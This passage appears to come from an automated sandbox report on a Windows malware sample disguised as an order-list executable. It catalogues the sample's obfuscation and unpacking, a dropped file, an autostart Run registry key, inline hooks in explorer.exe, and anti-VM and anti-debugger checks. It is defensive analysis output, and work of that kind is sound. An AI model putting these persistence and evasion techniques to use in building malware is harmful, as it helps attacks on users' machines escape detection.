Source: Binary string: cmmon32.pdb source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.6561395724.000000000D810000.00000002.sdmp
Source: Binary string: cmmon32.pdbGCTL source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000003.6491031980.0000000000940000.00000004.sdmp, 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6638023768.0000000000F9F000.00000040.sdmp, cmmon32.exe, 00000006.00000002.7705352912.000000000446F000.00000040.sdmp
Source: Binary string: wntdll.pdb source: 42LIST OF ITEMS TO ORDER.exe, cmmon32.exe, px7426l3fbx.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.6561395724.000000000D810000.00000002.sdmp
PE file contains a valid data directory to section mapping
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Unpacked PE file: 19.2.px7426l3fbx.exe.3680000.3.unpack
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 18_1_00C1A6F5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 18_1_00C1A6F5
PE file contains an invalid checksum
Source: px7426l3fbx.exe.5.dr | Static PE information: real checksum: 0x809f1 should be: 0x81400
Source: 42LIST OF ITEMS TO ORDER.exe | Static PE information: real checksum: 0x809f1 should be: 0x81400
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EFDE2D push ecx; ret 3_2_00EFDE40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D39D0 push esp; ret 3_2_003D39D5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D99C5 push eax; ret 3_2_003D9A18
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D9A1B push eax; ret 3_2_003D9A82
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D9A12 push eax; ret 3_2_003D9A18
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D9A7C push eax; ret 3_2_003D9A82
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_003D4AF5 push ebx; iretd 3_2_003D4AD9
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_043CDE2D push ecx; ret 6_2_043CDE40
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C1A068 push ds; iretd 6_2_00C1A069
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C199C5 push eax; ret 6_2_00C19A18
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C14AF5 push ebx; iretd 6_2_00C14AD9
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C19A7C push eax; ret 6_2_00C19A82
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C19A12 push eax; ret 6_2_00C19A18
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 6_2_00C19A1B push eax; ret 6_2_00C19A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 18_1_00C14195 push ecx; ret 18_1_00C141A8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_004199C5 push eax; ret 19_2_00419A18
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_004139D0 push esp; ret 19_2_004139D5
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00419A7C push eax; ret 19_2_00419A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00419A12 push eax; ret 19_2_00419A18
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00419A1B push eax; ret 19_2_00419A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_00414AF5 push ebx; iretd 19_2_00414AD9
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 19_2_0194DE2D push ecx; ret 19_2_0194DE40

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe | File created: C:\Users\CRAIGH~1\AppData\Local\Temp\Eobzxyvuh\px7426l3fbx.exe

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\SysWOW64\cmmon32.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5J8TI4Q8PJCL

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x33 0x34
Disables application error messages (SetErrorMode)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EE7AD6 rdtsc 3_2_00EE7AD6
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | API coverage: 3.2 %
Source: C:\Windows\SysWOW64\cmmon32.exe | API coverage: 6.0 %
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | API coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4776 | Thread sleep time: -75000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: SCSI\CdRomVBOX____CD-ROM__________
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: SCSI\CdRomVBOX____CD-ROM__________1.0_SCSI\CdRomVBOX____CD-ROM__________SCSI\CdRomVBOX____SCSI\VBOX____CD-ROM__________1VBOX____CD-ROM__________1GenCdRom
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: SCSI\CdRomVBOX____CD-ROM__________1.0_
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: SCSI\VBOX____CD-ROM__________1
Source: svchost.exe, 0000000C.00000000.7211611715.0000022381481000.00000004.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: VBOX____CD-ROM__________1
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmp | Binary or memory string: Hyper-V RAWR=Intel64 Family 6 Model 63 Stepping 2, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=%Program
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmp | Binary or memory string: SCSI\CdRomVBOX____
Queries a list of all running processes
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\explorer.exe | File opened: C:\Windows\WinSxS\FileMaps\_0000000000000000.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | System information queried: KernelDebuggerInformation
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WWAHost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EE7AD6 rdtsc 3_2_00EE7AD6
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EEA240 NtReadFile,LdrInitializeThunk, 3_2_00EEA240
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 18_1_00C13C9A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_1_00C13C9A
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe | Code function: 18_1_00C1A6F5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 18_1_00C1A6F5
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F3F8F0 mov eax, dword ptr fs:[00000030h] 3_2_00F3F8F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ECE0E8 mov eax, dword ptr fs:[00000030h] 3_2_00ECE0E8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED58EB mov eax, dword ptr fs:[00000030h] 3_2_00ED58EB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F6B8F9 mov eax, dword ptr fs:[00000030h] 3_2_00F6B8F9
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EDA0F8 mov eax, dword ptr fs:[00000030h] 3_2_00EDA0F8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED48CB mov eax, dword ptr fs:[00000030h] 3_2_00ED48CB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F5F8C0 mov eax, dword ptr fs:[00000030h] 3_2_00F5F8C0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F610CF mov eax, dword ptr fs:[00000030h] 3_2_00F610CF
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA90D0 mov eax, dword ptr fs:[00000030h] 3_2_00EA90D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F650B3 mov eax, dword ptr fs:[00000030h] 3_2_00F650B3
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F708A5 mov eax, dword ptr fs:[00000030h] 3_2_00F708A5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F240A7 mov eax, dword ptr fs:[00000030h] 3_2_00F240A7
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA58BC mov eax, dword ptr fs:[00000030h] 3_2_00EA58BC
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F32893 mov eax, dword ptr fs:[00000030h] 3_2_00F32893
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ECE067 mov eax, dword ptr fs:[00000030h] 3_2_00ECE067
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F3F867 mov eax, dword ptr fs:[00000030h] 3_2_00F3F867
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ECF076 mov eax, dword ptr fs:[00000030h] 3_2_00ECF076
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED2870 mov eax, dword ptr fs:[00000030h] 3_2_00ED2870
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EC2073 mov eax, dword ptr fs:[00000030h] 3_2_00EC2073
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EDE845 mov eax, dword ptr fs:[00000030h] 3_2_00EDE845
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F6A844 mov eax, dword ptr fs:[00000030h] 3_2_00F6A844
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA9050 mov eax, dword ptr fs:[00000030h] 3_2_00EA9050
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EBF050 mov eax, dword ptr fs:[00000030h] 3_2_00EBF050
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F5F83F mov eax, dword ptr fs:[00000030h] 3_2_00F5F83F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA5020 mov eax, dword ptr fs:[00000030h] 3_2_00EA5020
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED0021 mov eax, dword ptr fs:[00000030h] 3_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA7025 mov eax, dword ptr fs:[00000030h] 3_2_00EA7025
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA383B mov eax, dword ptr fs:[00000030h] 3_2_00EA383B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F25023 mov eax, dword ptr fs:[00000030h] 3_2_00F25023
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EE4030 mov eax, dword ptr fs:[00000030h] 3_2_00EE4030
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EC4800 mov eax, dword ptr fs:[00000030h] 3_2_00EC4800
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EBA01A mov eax, dword ptr fs:[00000030h] 3_2_00EBA01A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F61008 mov eax, dword ptr fs:[00000030h] 3_2_00F61008
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA51E0 mov eax, dword ptr fs:[00000030h] 3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA51E0 mov ecx, dword ptr fs:[00000030h] 3_2_00EA51E0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EB79F7 mov eax, dword ptr fs:[00000030h] 3_2_00EB79F7
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F611D2 mov eax, dword ptr fs:[00000030h] 3_2_00F611D2
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED69C0 mov ecx, dword ptr fs:[00000030h] 3_2_00ED69C0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EE41D4 mov eax, dword ptr fs:[00000030h] 3_2_00EE41D4
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EAA9A6 mov eax, dword ptr fs:[00000030h] 3_2_00EAA9A6
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED19B0 mov eax, dword ptr fs:[00000030h] 3_2_00ED19B0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F27194 mov eax, dword ptr fs:[00000030h] 3_2_00F27194
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA516E mov eax, dword ptr fs:[00000030h] 3_2_00EA516E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA516E mov ecx, dword ptr fs:[00000030h] 3_2_00EA516E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA397E mov eax, dword ptr fs:[00000030h] 3_2_00EA397E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EAB171 mov eax, dword ptr fs:[00000030h] 3_2_00EAB171
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED214F mov eax, dword ptr fs:[00000030h] 3_2_00ED214F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED594B mov eax, dword ptr fs:[00000030h] 3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F61151 mov eax, dword ptr fs:[00000030h] 3_2_00F61151
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA3158 mov ecx, dword ptr fs:[00000030h] 3_2_00EA3158
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EDA93B mov eax, dword ptr fs:[00000030h] 3_2_00EDA93B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EAB101 mov eax, dword ptr fs:[00000030h] 3_2_00EAB101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EA4101 mov eax, dword ptr fs:[00000030h] 3_2_00EA4101
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00EBF11B mov eax, dword ptr fs:[00000030h] 3_2_00EBF11B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00F7010D mov eax, dword ptr fs:[00000030h] 3_2_00F7010D
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe | Code function: 3_2_00ED7110 mov eax, dword ptr fs:[00000030h]